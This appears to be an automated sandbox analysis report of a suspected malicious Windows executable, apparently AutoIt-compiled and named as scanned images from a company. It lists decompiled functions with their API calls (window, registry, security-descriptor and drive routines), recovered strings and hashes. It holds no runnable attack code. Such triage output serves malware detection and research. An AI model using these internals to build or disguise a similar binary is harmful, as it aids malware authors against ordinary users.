                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 004D2A97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                • API String ID: 2910397461-517079104
                                                                                • Opcode ID: 5edfafb65f9fa7523b83d42b1b560dbacac879ba7105203aadc216542b72f1b9
                                                                                • Instruction ID: 93c6cb1e18120059bb436f4b3e25393ffa60588ed9fb48486c1926f03900f92c
                                                                                • Opcode Fuzzy Hash: 5edfafb65f9fa7523b83d42b1b560dbacac879ba7105203aadc216542b72f1b9
                                                                                • Instruction Fuzzy Hash: 2BB19D71A00209AFEB24DF68CC85FAF7BA9EF15715F00451AF914EB291D774AD01CB98
                                                                                Function 004C4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004C4AED
                                                                                • GetDriveTypeW.KERNEL32(?,004ECB68,?,\\.\,004ECC08), ref: 004C4BCA
                                                                                • SetErrorMode.KERNEL32(00000000,004ECB68,?,\\.\,004ECC08), ref: 004C4D36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 4245478bffe0c46821fc605f7f1ac3e31547212feb5e1aa8971015609f6963da
                                                                                • Instruction ID: 20240f72474bf192d9cfa42737ef06470f38a669aa6f6a3bb3bf3679c1425043
                                                                                • Opcode Fuzzy Hash: 4245478bffe0c46821fc605f7f1ac3e31547212feb5e1aa8971015609f6963da
                                                                                • Instruction Fuzzy Hash: 5C61E838601105DBEB44DF14CBA1EA97BB0BB84344B21441FF8079B662DB3DED82DB5A
                                                                                Function 004E73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 004E7421
                                                                                • SetTextColor.GDI32(?,?), ref: 004E7425
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004E743B
                                                                                • GetSysColor.USER32(0000000F), ref: 004E7446
                                                                                • CreateSolidBrush.GDI32(?), ref: 004E744B
                                                                                • GetSysColor.USER32(00000011), ref: 004E7463
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004E7471
                                                                                • SelectObject.GDI32(?,00000000), ref: 004E7482
                                                                                • SetBkColor.GDI32(?,00000000), ref: 004E748B
                                                                                • SelectObject.GDI32(?,?), ref: 004E7498
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004E74B7
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004E74CE
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004E74DB
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004E752A
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004E7554
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 004E7572
                                                                                • DrawFocusRect.USER32(?,?), ref: 004E757D
                                                                                • GetSysColor.USER32(00000011), ref: 004E758E
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004E7596
                                                                                • DrawTextW.USER32(?,004E70F5,000000FF,?,00000000), ref: 004E75A8
                                                                                • SelectObject.GDI32(?,?), ref: 004E75BF
                                                                                • DeleteObject.GDI32(?), ref: 004E75CA
                                                                                • SelectObject.GDI32(?,?), ref: 004E75D0
                                                                                • DeleteObject.GDI32(?), ref: 004E75D5
                                                                                • SetTextColor.GDI32(?,?), ref: 004E75DB
                                                                                • SetBkColor.GDI32(?,?), ref: 004E75E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: bbd25ae785ad1f0387fa87963798900acdc75bb721bed48ef5b08059ece1b4ea
                                                                                • Instruction ID: 92f9aec080cd3a04f1d898f21ad5351977345985f6e1a6b3db10c8c3ec378f5a
                                                                                • Opcode Fuzzy Hash: bbd25ae785ad1f0387fa87963798900acdc75bb721bed48ef5b08059ece1b4ea
                                                                                • Instruction Fuzzy Hash: 2B618172900258BFDF009FA4DC88EAEBFB9EB08321F104125F911AB2A2D7749941DF94
                                                                                Function 004E0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 004E1128
                                                                                • GetDesktopWindow.USER32 ref: 004E113D
                                                                                • GetWindowRect.USER32(00000000), ref: 004E1144
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E1199
                                                                                • DestroyWindow.USER32(?), ref: 004E11B9
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004E11ED
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004E120B
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004E121D
                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 004E1232
                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 004E1245
                                                                                • IsWindowVisible.USER32(00000000), ref: 004E12A1
                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004E12BC
                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004E12D0
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004E12E8
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 004E130E
                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004E1328
                                                                                • CopyRect.USER32(?,?), ref: 004E133F
                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 004E13AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: aca0f1eb3de59b2be138f15f8fc19ff66900fcf5b91338568cd873d4fce5ae61
                                                                                • Instruction ID: 09db6ec24870b08ecd865bc4cb48a961a9ab13884b1c9c5b963d0135c71da372
                                                                                • Opcode Fuzzy Hash: aca0f1eb3de59b2be138f15f8fc19ff66900fcf5b91338568cd873d4fce5ae61
                                                                                • Instruction Fuzzy Hash: 61B1AE71604380AFD704DF65C884B6BBBE4FF88345F00891EF9999B262C735E845CB99
                                                                                Function 00468891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00468968
                                                                                • GetSystemMetrics.USER32(00000007), ref: 00468970
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0046899B
                                                                                • GetSystemMetrics.USER32(00000008), ref: 004689A3
                                                                                • GetSystemMetrics.USER32(00000004), ref: 004689C8
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004689E5
                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004689F5
                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00468A28
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00468A3C
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00468A5A
                                                                                • GetStockObject.GDI32(00000011), ref: 00468A76
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00468A81
                                                                                  • Part of subcall function 0046912D: GetCursorPos.USER32(?), ref: 00469141
                                                                                  • Part of subcall function 0046912D: ScreenToClient.USER32(00000000,?), ref: 0046915E
                                                                                  • Part of subcall function 0046912D: GetAsyncKeyState.USER32(00000001), ref: 00469183
                                                                                  • Part of subcall function 0046912D: GetAsyncKeyState.USER32(00000002), ref: 0046919D
                                                                                • SetTimer.USER32(00000000,00000000,00000028,004690FC), ref: 00468AA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: e34382107de2505be2b1d568162ef9ac4132fd5f94c35077fdf387833227309b
                                                                                • Instruction ID: fc3c5df6880a0934e29b1fef709d47c0285d3e5ffafc851c7fd54429fcbb4e7d
                                                                                • Opcode Fuzzy Hash: e34382107de2505be2b1d568162ef9ac4132fd5f94c35077fdf387833227309b
                                                                                • Instruction Fuzzy Hash: 67B1B2756002099FDF14DF68CC85BAE3BB4FB19314F15422AFA15AB290DB38E841CF59
                                                                                Function 004B0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B1114
                                                                                  • Part of subcall function 004B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1120
                                                                                  • Part of subcall function 004B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B112F
                                                                                  • Part of subcall function 004B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1136
                                                                                  • Part of subcall function 004B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B114D
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004B0DF5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004B0E29
                                                                                • GetLengthSid.ADVAPI32(?), ref: 004B0E40
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 004B0E7A
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004B0E96
                                                                                • GetLengthSid.ADVAPI32(?), ref: 004B0EAD
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004B0EB5
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004B0EBC
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004B0EDD
                                                                                • CopySid.ADVAPI32(00000000), ref: 004B0EE4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004B0F13
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004B0F35
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004B0F47
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0F6E
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0F75
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0F7E
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0F85
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0F8E
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0F95
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004B0FA1
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0FA8
                                                                                  • Part of subcall function 004B1193: GetProcessHeap.KERNEL32(00000008,004B0BB1,?,00000000,?,004B0BB1,?), ref: 004B11A1
                                                                                  • Part of subcall function 004B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004B0BB1,?), ref: 004B11A8
                                                                                  • Part of subcall function 004B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004B0BB1,?), ref: 004B11B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                • Opcode ID: 2d66e37cdfb635ea961e9c435bc4d3bcef603d81c77d067e9f9d8aebc786b98c
                                                                                • Instruction ID: 8ba414245dd2b16831f66d64e83f5c4af29b02497049293af18d56e69e34ee89
                                                                                • Opcode Fuzzy Hash: 2d66e37cdfb635ea961e9c435bc4d3bcef603d81c77d067e9f9d8aebc786b98c
                                                                                • Instruction Fuzzy Hash: D5715F71A0020AABDF209FA5DC84FEFBBB8BF05301F048166F919A6251D775D906CB74
                                                                                Function 004DC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DC4BD
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,004ECC08,00000000,?,00000000,?,?), ref: 004DC544
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 004DC5A4
                                                                                • _wcslen.LIBCMT ref: 004DC5F4
                                                                                • _wcslen.LIBCMT ref: 004DC66F
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 004DC6B2
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 004DC7C1
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 004DC84D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004DC881
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004DC88E
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 004DC960
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 9721498-966354055
                                                                                • Opcode ID: 03a21490ab401710982738f170fa01f36df8098050593860e5d3fb5ed40cc00b
                                                                                • Instruction ID: b97e055b7a89a56421f77b07db746c15d9ff32175df4c8c0014d460a52bf8bf6
                                                                                • Opcode Fuzzy Hash: 03a21490ab401710982738f170fa01f36df8098050593860e5d3fb5ed40cc00b
                                                                                • Instruction Fuzzy Hash: 73128E356042019FD714DF15C891E2AB7E5FF88359F04885EF88A9B3A2DB39EC45CB89
                                                                                Function 004E091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 004E09C6
                                                                                • _wcslen.LIBCMT ref: 004E0A01
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004E0A54
                                                                                • _wcslen.LIBCMT ref: 004E0A8A
                                                                                • _wcslen.LIBCMT ref: 004E0B06
                                                                                • _wcslen.LIBCMT ref: 004E0B81
                                                                                  • Part of subcall function 0046F9F2: _wcslen.LIBCMT ref: 0046F9FD
                                                                                  • Part of subcall function 004B2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004B2BFA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 1103490817-4258414348
                                                                                • Opcode ID: 87337f932baef59fe58216db3fe9cd7b126ddce1678c4231560576fa867639a2
                                                                                • Instruction ID: 60e79b737690c058669bf408fac3d4aa1d3f2553d416aea9cbf5c17bbf3af866
                                                                                • Opcode Fuzzy Hash: 87337f932baef59fe58216db3fe9cd7b126ddce1678c4231560576fa867639a2
                                                                                • Instruction Fuzzy Hash: F8E1D2312083419FC714DF26C45086AB7E1FF98309F14495EF8A55B362D778ED8ACB8A
                                                                                Function 004DC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 1256254125-909552448
                                                                                • Opcode ID: 7d2083a642a3bbfb1515e7c1ad00e30d714ba10086c8ba671f160165887a1144
                                                                                • Instruction ID: bcbbe46d62b6105ab965a9600923c6899b0c98ea0adf23e39d666f7447be0641
                                                                                • Opcode Fuzzy Hash: 7d2083a642a3bbfb1515e7c1ad00e30d714ba10086c8ba671f160165887a1144
                                                                                • Instruction Fuzzy Hash: 4871147261012B8BCB20DE7CD9E16FB33A1ABA4754F10052BF8569B385E63CDD85C399
                                                                                Function 004E833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 004E835A
                                                                                • _wcslen.LIBCMT ref: 004E836E
                                                                                • _wcslen.LIBCMT ref: 004E8391
                                                                                • _wcslen.LIBCMT ref: 004E83B4
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004E83F2
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,004E361A,?), ref: 004E844E
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004E8487
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004E84CA
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004E8501
                                                                                • FreeLibrary.KERNEL32(?), ref: 004E850D
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004E851D
                                                                                • DestroyIcon.USER32(?), ref: 004E852C
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004E8549
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004E8555
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 799131459-1154884017
                                                                                • Opcode ID: 8a2f32308eba5e736ffd8a3ba658871f5925d23356e43205e04eeff1f40bd4e7
                                                                                • Instruction ID: f089b4b677da8af0987df43307fb2e78d9647dc1702cc81d80c32e61c44a1e84
                                                                                • Opcode Fuzzy Hash: 8a2f32308eba5e736ffd8a3ba658871f5925d23356e43205e04eeff1f40bd4e7
                                                                                • Instruction Fuzzy Hash: 1E61D071500255BAEF148F65CC81BFF77A8FB04712F10461AF819DA1D1EB789981C7A4
                                                                                Function 00457778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 0-1645009161
                                                                                • Opcode ID: 9681ceac4ae5247be7f6c1fe555ffd8398199b8f6834a25497826a35f58740cb
                                                                                • Instruction ID: 26bf3c1b0321fd438d7ebdd578642650311ee6a17910a7b95413f2441685a51c
                                                                                • Opcode Fuzzy Hash: 9681ceac4ae5247be7f6c1fe555ffd8398199b8f6834a25497826a35f58740cb
                                                                                • Instruction Fuzzy Hash: 0881E971A40205ABDB11AF61EC42FAF3B64AF14305F14443BFD059A293EB7C9A05C79D
